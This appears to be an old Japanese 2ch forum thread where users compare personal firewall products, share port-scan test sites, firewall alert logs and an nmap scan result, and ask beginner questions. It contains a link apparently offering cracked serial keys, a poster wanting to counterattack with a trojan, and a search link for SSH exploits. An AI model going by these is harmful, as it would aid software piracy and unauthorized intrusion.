自分でポーと好きゃんしてみる。

ポートスキャンツールがありません

http://scan.sygatetech.com/

ブラウザの件ですが、
オペラっていつになったら、
日本語版でるのでしょうか？
IEより安全かなって思っているのですが。

正式版登場！新鋭ブラウザ Opera Ver.4
http://pc.2ch.net/test/read.cgi/win/1008954552/

>>822
すみませんでした。
逝ってきます。

>>819
月刊マガジンの裏表紙の通販にﾉｯﾃﾀYO!

ﾜﾗｰﾀ

WinXP環境ではどのFWがいいの？
多重ログオンしてる場合、別のログオンセッションにAsk？の画面が出ちゃって、
Outpostは使いにくかったけど。

>825
ｻﾝｸｽ-ｺ :P

ところでTiny新版出るね
ﾄﾞｷﾄﾞｷ。。。危ない予感。
ｿﾞﾈは重い&ｴﾗｰﾀ続出だし
黒氷は穴ﾊｹｰﾝ(･∀･)!だし
ﾄﾞｲﾂ野郎嫌いだし
災ｹﾞﾄはどっちつかずだし(Tinyよか重いのがﾔ)
Tinyだけが頼りなのよ
ﾄﾞｷﾄﾞｷ。。。
いざとなったらみんな災ｹﾞﾄに雪崩れ込むんかな?

自己ﾚｽ
黒氷はIDSだし、
穴っつってもPFWと併用でなんとかなるよね
すまそ

ﾜｸﾜｸだよ　だからあげ

ここでやったら
http://scan.sygatetech.com/trojanscan.html
Trojan 80 OPEN Executor, RingZero
ってでた。これってトロられてるの？

会社でも使っていいのはどのFW？

それはさすがに会社の管理者以外知らんだろ。

>>830
違う。単にオープンだったポートを
http://scan.sygatetech.com:443/cgi-bin/probe/trojans.cgi
の組み合わせで報告してるだけだよ。

sygateインスト成功したんだけど、somebody　is　scanning　your　computoｒ
って出ているんだけど、

>>834
だけど？

SCANに掛けても別に異常はないのに
そういう表示が出るのってなんなの？

問題解決

　

XPとｳｨﾙｽﾊﾞｽﾀｰのFWはどっちの方が性能上なんでしょうか？

細かい設定はXPのフィルタリングのほうが出来るけどね。

521 名前：いづれもW2Ksp2 投稿日：02/02/07 09:52
ZoneAlarm(最新版)は、MSNメッセンジャーの音声チャットを妨害することが
検証されました。
ZoneAlarm(最新版)は、ビットアリーナの着信を妨害する疑いがあることが
確認されました

Outpostっていいよにゃぁ。

窓の杜にも紹介されてるけど、
XP使ってて、マルチユーザ機能しょっちゅう使うから、OutPostはちょと使いづらい。
結局ZAで落ち着き。

>>841
細かく設定できるPFWに変えればよい。
UDPの外からの投げっぱなしパケットは攻撃とみなされて遮断してしまうだろうな。

コレガのルーターを使ってて、OSはwinxpのhomeなんですけど、
tinyでもSygateでもノートンでも、firewallを使わなくても
http://scan.sygatetech.com/prequickscan.html
↑ではICMP以外がclosedでICMPがopenです。
これはルーターを使ってるからでしょうか？
勿論いろいろ設定したんですが・・・
それとも、ちゃんと調べて設定しろヴォケですか？

ちなみに、ルーターは簡易firewall付きです。
firewallソフトありでも無しでも結果が変わらないなんて、
自分の設定がまずいのかなと思いました。

>>845
でしょうね。
その簡易Firewallがどんなものか分からないので詳しくは分からないけど。

>>845

おれは厨房だけど、訳も分からず、Tinyとメルコのルーター（エアーステーション）を使っている。
ルーターはデフォルトだ。
おれも845のセキュリティチェックを試してみた。
すると、「８０」、「１１３」は「ＣＬＯＳＥＤ」
ＩＣＰＭは、「ＯＰＥＮ」だった。
そのほかはすべてブロックした。
どうすれば、ＩＣＰＭがブロックできるかなぁ。

>>845
http://www.corega.co.jp/support/download/router_barfarm.htm
見るべし

>>848
知らないふりして聞くのはDOSと同じ

↓お前だろ↓
http://pc.2ch.net/test/read.cgi/sec/1006859839/879

ここにもあったＹＯ！
http://asian.elitecities.com/books/value.html

>>847
やっぱりルータ側の問題だったみたいです。
>>849
四苦八苦してファームウェアを更新して、ステルスモードを有効にしてみたところ、
http://scan.sygatetech.com/prequickscan.html
↑ではfirewall無しで、closedからICMPを含め全てBlockedに、
https://grc.com/x/ne.dll?bh0bkyd2
こちらでは全てStealthになりました！
849さん、本当にありがとうございました！

>>844
フリーの、他のＰＦＷ、どうか紹介してください
おねがいします

>>853
>>2 & >>3のFirewall 解説サイト

なんかオープンソースなWindowsで使えるFWないですかねぇ。

>>855
>>854

Sygate Personal Firewall を常用している人います？

スレ立ってるのが見えんのか
SygatePersonalFireWall
http://pc.2ch.net/test/read.cgi/sec/993936202/

http://www.puchiwara.com/hacking/
　　　　　　　　　　　　　　 　/　ｊｊｊｊ　　　　　＿__
　　　　　　　　　　　　　　／　ﾉ　　　 　 　{!!! _ ヽ､
　　　　　　　　　　　　　,/　　ﾉ　　　　 　　　~ `､　 ＼
　　　　　　　　　　　　　`､ 　`ヽ.　　　 人 　, ‐'` 　ﾉ
　ｷﾀ━━━━━━━　 ＼　　`ヽ （ﾟ∀ﾟ）"　.ノ／━━━━━━━━━！！！！
　　　　　　　　　　　　　　　 ｀､ヽ.　　｀`Y"　 　r '
　　　　　　　　　　　　　　 　　　ｉ. ､ 　　￥　 　ﾉ
　　　　　　　　　　　　　　　 　　`､.` -‐´;｀ー ｲ
　　　　　　　　　　　　　　　 　　　 ｉ 彡　ｉ　ミ/
　　　　　　　　　　　　　　　　　 ／　　　　　`＼
　　　　　　　　　　　　　　　　 /　　　／ヽ、　　ヽ

作者かも。　


宣伝うざい。

>>855
さすがにオープンソースのはないだろう。

http://mentai.2ch.net/test/read.cgi/accuse/1013274655/
500 ：夜勤 ★ ：02/02/10 03:37 ID:???
まぁ 100Mbps で、どれだけのリクエストがあるか
わかりませんが、当然すごーくたくさんのリクエストがあるわけで、
多分 fire wall の導入だけで、1000万以上はかかるかと、
規模を見積もって見なきゃわかりませんが、

　　

BlackICE Defender 評価版 2.5coJE使ってるんですけど
アタックしてくる奴で注意レベルの警報って気にしなくてもよいですか

BlackICE Defenderの2.9ってヤヴァイな

俺もBID使い始めて間もないんだけどアタックを検知してタスクトレイで
ピコピコしてる状態・・・これはほっといてもいいの？
俺はいちいちBIDウィンドウをアクティブにしてピコピコを止めてるんだけど・・・

>>867
ピコピコしないように設定すればいい。ちなみに音も消せば静かで（･∀･）ｲｲ!

なるほど、こんな簡単なことでしたね。
厨でｽﾏｿ

　

　

>>841
ZoneAlarm(最新版)は、MSNメッセンジャーの音声チャットを妨害することが
検証されました。
ZoneAlarm(最新版)は、ビットアリーナの着信を妨害する疑いがあることが
確認されました

Sygate Personal Firewall 4 に入れ替えると、
・MSNメッセンジャーの音声チャットができるようになったこと
が検証されました。

MSMなんざ使わねーし(w

MSMってどんなプレイ？M二人にS一人？ハァハァ・・・

　

又、トロイの木馬をローカルコンピューターに仕掛けようとされた。
いったい誰なんでしょう・・・・トロイの木馬って私もやりかえしたいんですが
簡単にできるものなんでしょうか？それから未使用ポートを遮断したとかいうのも
よくでてくるんですが、これはいったいなんなんでしょうか？
２１３．２０４．１３２．１０２にトロイの木馬を仕掛けられました。

今、初めて防火壁入れたんですけど、起動したらいきなり進入が…
もしかしてかなり進入されてた？kerioのお陰で助かりました…

>>876
や、やりかえしたい？？？？素人のくせに気丈だね。

うぐぅ　お願いだよ。tiny3.0出して。

>>879
もう出ないって事に俺のなかではｹﾃｰｲ

　

　　　

尻集　最新版
http://goodshop2002.mariansela.com/

ソースコードの最後の方にヒントが・・・・
JPEG偽装

ウイルスバスターの尻もあり。

どなたか、重さで順位をつけてください。

1. NIS
2. ZoneAlarm
3. Sygate
4. BlackICE
5. Tiny/Kerio

添削よろしく

NIS2001使ってて今Sygateだけど、
Tinyか…

　

>>885
9x系ならリソース占有率も気になるところだね。

ていうかこれ>>885、ZAとTinyしか使用したことのない俺が
適当に勘で書いてみたんだけど合ってるの？
この板で色々読んでて多分こんな感じだろうなーって書いただけよ。

>>888
9x系なら間違いなくTinyだろう。
軽くて、リソースを食わない。

Kerioもリソース食わない。
まあ、元がTinyだから当然だけど。

>>890
WIN2000などのNT系OSでもやっぱりTinyですか？
自分が使った感じだと違いがわからなかったもんで。
あっ！違いがわからないなら見た目でいいのか。
でも潜在的な負荷が知りたいです。

　

ルーターのポートフィルタリング+ノートン　アンチウィルス+XPのPFW
で結構いけると思うのだがどうだろう？
軽さという点ではXPのPFWはどうなのだろう？

ポートフィルタリングとはいわない
フィルタされるのはパケットだから

ここ、初めて見てます。
ちょっと、質問です。
ルーターでパケットフィルタを設定してあれば、
パーソナルFWっていらないというか、大丈夫なんですよね？
つまり、ルーターとパーソナルFWで防げるものってダブっているって
思っているんですけどこれって正しいですよね？

機能的にはそうだけどアプリごとに許可とかできるFWも
結構便利だよ

　

>>897
というより、ルータではアプリケーションによるフィルタリングが
できないので、たまたま許可したポートがトロイの通信ポートだったら
トロイの通信も許可することに。

だからよーするに
ルーターとパーソナルFWで防げるものはダブっていないのだ

omae ha bakabon no papa ka!

PC上のFWと連動できるルータって無い？
PC上で特定のアプリを起動している間だけ
ルータの特定のポートを開けておくようなことのできるシステム。

言葉明瞭、意味不明瞭

>>903
懐かしいな！思い出したくもないけど

>>46　>>50
そういう報告もあるね。
とりあえずうちはWinXPのICSホストで使えてるよー
Win2KのときもOKだった。
ぞねと違ってアンインストでトラブるってのは聞かないから、
入れてみて動かないようなら他のに乗り換えるってのも手かも。

>>50
いや、ふつーICSって言うからOK♪

　　　
　　　　☆★☆★　　８ヶ月　　☆★☆★

いいかんじ♪

　

>>902
｢UPｎP｣　で調べてみな♪

　

　

　

人力防火壁『トメさん』　コバヤシ和夫 ５００円　ってどーよ？

Tiny Personal Firewallをダウンロードしたいんだが
厨でどれがソフトかもわからん。。。。。
たのむ誰かおせーて

>>914
ここいっといで
http://members.tripod.co.jp/eazyfox/

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on (210.161.139.162):
(The 1527 ports scanned but not shown below are in state: closed)
Port State Service
23/tcp filtered telnet
25/tcp open smtp
81/tcp open hosts2-ns
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netbios-ssn
199/tcp filtered smux
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1030/tcp open iad1
1433/tcp open ms-sql-s
5800/tcp open vnc
5900/tcp open vnc
8081/tcp open blackice-icecap


Nmap run completed -- 1 IP address (1 host up) scanned in 16 seconds

これってセキュリティ弱いですか？

>>916
うん、かなり貧弱だよ、そんな貴方は今日発売のノートン２００２の
新製品ノートン２００２プロフェッショナルを買うべし

おせっかいなﾉｰﾄﾝ先生よりも、質実剛健なZonealarmの方が好き。
Zonealarmは糞とか言うけど、どこが悪いの？

リソース食う→重い→不安定→怪しいのクアトロコンボ
機能はまあまあとして、Killerアプリのおまけ付き
あのゴテゴテしたウィンドウ見て高倉健は想像できん

>>919
言ってることは良いと思うけど、本当に使いこなしていた？って
聞きたくなるなぁ・・・・まぁ、どうでもいいからsage

うう、反論できん｡でも好きだ｡

>あのゴテゴテしたウィンドウ見て高倉健は想像できん
自分は渥美清を想像するけど｡

まぁノートンの弾よけくらいにはなるでしょう｡
それだけでも入れてる価値があるということでage｡

お、おい、、、ネタだろ？
ネタだよな・・・。
ノートンとZoneだよ？

　

Kerio入れろよ

>>914
TINYからKerioになったんだよ
http://www.kerio.com/parser/mainpage.php?id=209&lg=1

Kerioって名前ださっ！！

>>926
ケロケロケロッピーを馬鹿にしてるな？

ノートン入れてＺＯＮＥ入れて意味あるの？

>>928
意味なし

The firewall has blocked Internet access to your computer (HTTP) from 210.171.30.18 (TCP Port 4282) [TCP Flags: S].

>>929
そうですか

ＺＯＮＥはシンプルで好きでしたが
おさらばします

>>931
ノートンとおさらばしてもいいけどね。

Tiny入れたら、2chへ書き込むときに「公開PROXY規制中」って出るんですけど、
これを回避するには、どう設定を変えたら良いんですか？

結局どれが安心なんだ？！ノートンが優勢みたいだけど売り上げは
VBが上だし！！

210.250.22.100:4074
こいつがport22をツンツンしてくるのですが、いったい何をしたいのでしょうか。
たしかsshだったと思うんですが、何を仕掛けてくるつもりなのか、どなたかご教授お願いします。

>>934
PFWの機能は、Nortonの方が上。ずっと。
アンチウイルスソフトとしての機能は、対応するウイルスのタイプというか分布みたいのが微妙に異なるんで何ともいえない。

>>934
まかひー以外（バスターも最近安定してきたし）

>>935
http://www.google.co.jp/search?hl=ja&q=ssh&lr=

>>938
レスありがとうございます。
telnetに代わるリモート操作に関係するプロトコルらしいことはわかっていたのですが、
そのポートにアクセスがあったということは、他人のPCをリモート操作しようとしていた
と判断してよいのでしょうか。

日付: 02/03/06 時刻: 0:45:58
規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (80.133.157.44､)
----------------------------------------------------------------
The firewall has blocked Internet access to your computer
(TCP Port) from 80.133.157.44

Time: 02/03/06 0:45:58

zoneとinternet security入れてたら同時に反応してくれました。
見ていた面白かったです。以上。それだけ。

見ていて

>>939
http://www.google.co.jp/search?hl=ja&q=ssh+remote+%7Bexploit%7Cexploitable%7D+vulnerability&lr=
http://www.google.co.jp/search?hl=ja&q=%82%C7%82%A4+%94%BB%92f%82%B5%82%E6%82%A4%82%AA+%8CN%82%CC+%8F%9F%8E%E8%82%BE%82%C6+%8Ev%82%A4%82%AA&lr=

>>939
http://www.google.co.jp/search?sourceid=navclient&ie=utf8&oe=utf8&q=%E3%81%8A%E5%89%8D%E3%81%AE%E8%82%9B%E9%96%80%E3%81%AB%E3%82%AD%E3%82%B9%E3%82%92%E3%81%97%E3%81%9F%E3%81%84

ﾌﾞﾗｯｸｱｲｽはIDSも防げるからいいよって言われたんですが
ﾉｰﾄﾝにその機能はないんですか？

マカフィー良いよ

ほんと？
どうして？

>>944
ノートンインターネットセキュリティ２００２プロフェッショナル

ここから毎日不正アクセスされるよ。
でも、いつもブロックしましたって、出るんだけどなんだか不安。
しかし、そのまま放置。どうやら相手はオランダのISPを使っているようだ。
ttp://www.apnic.net/db/dbcopyright.html

Outpostはどうです？
http://www.agnitum.com/

>>949
Agnitum Outpost
http://pc.2ch.net/test/read.cgi/sec/997301454/150

IDSを防ぐの？？？？？？

さっきMcafeeのPFW入れたら、
さっそくWindows\system32の中の、
alg.exe(Application Layer Gatway Servise)というのと
lsass.exe(LSA Shell)というのが検知されました。
これって何ですか？

>>952
ファイル名分かってんだし、まずてめえで検索するなりしてくださいませ。

さっき２ｃｈ開いたら、
セキュ板の中のFW総合スレッドで、
　OSも種別も書かない(しかもHNが初心者）
　過去ログも読まない（しかもアプリの名前がそのまんまなのに考えようともしてない）
という奴が検出されました。
これって何ですか？

まもなくここは　乂1000取り合戦場乂　となります。

　 　 　 ＼∧＿ﾍ　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　,,､,､,,,　/ ＼〇ノゝ∩ ＜　1000取り合戦、いくぞｺﾞﾙｧ！！　　　　　　　,,､,､,,,
　　　　/三√ ﾟДﾟ)　/　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿　　,,､,､,,,
　　 　　/三/| ﾟＵﾟ|＼　　　　　　,,､,､,,,　　　　　　　　　　　　　　　　　　　　　　　,,､,､,,,
　,,､,､,,,　Ｕ （:::::::::::）　　,,､,､,,,　　　　　　　　　＼オーーーーーーーッ！！／
　　 　 　//三/|三|＼　　　　　∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　∪　 ∪　　　　　　 （　　　　）　　　 （　　　　 ）　　　（　　　　）　　　 ）
　,,､,､,,,　　　　　　　,,､,､,,,　　∧＿∧∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　,,､,､,,,　　　　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）

>>955
1000取り合戦の前に・・・・
次スレの名前決めて立てようよ。

じゃぁ、970の人が立てるって事でひとつよろしく。

955のAAが出てるのにこれだけ盛り上がらないスレもめずらしいな（ｗ

2ちゃんねらーの力で子供達を救おうよ（連日連夜　祭り開催中!）
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【ｸﾘｯｸ】 押してみっかな【ｸﾘｯｸ】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
　　

>>958
最後の１行、チェーンメールみたいで感じ悪いよ。

タイトル案
ファイアーウォールソフト総合スレ [不正浸入ブロック3回目]

>>957
"子供は居ない"んぢゃネーノ？

Kerio正式版になりました。

結局次スレは立たないの？

>じゃぁ、970の人が立てるって事でひとつよろしく。
９７０には、なりたくナイ

965

次スレ立てといた。
http://pc.2ch.net/test/read.cgi/sec/1016238340/

ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/1-4

　

　　

　　　

　

　　

ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/1-4

ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/

h

http://www.v1pon3.cjb.net/

「1000取りはsageでやる」（そして出来るだけ単文）
は2ch全板のマナー

ぱちもそって何？

a

1000　

さげ

ファイアーウォールソフト総合スレッド Part3 http://pc.2ch.net/test/read.cgi/sec/1016238340/

1000ゲット

ブー高木降臨

こんぺいとう下さい

裸一貫

>>45はネギ

俺はマクビティ

俺の座右の銘

酒池肉林

１０００００００げｔｔｔｔｔｔｔｔｔｔｔｔｔっと

ネギが好き

おい

１

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。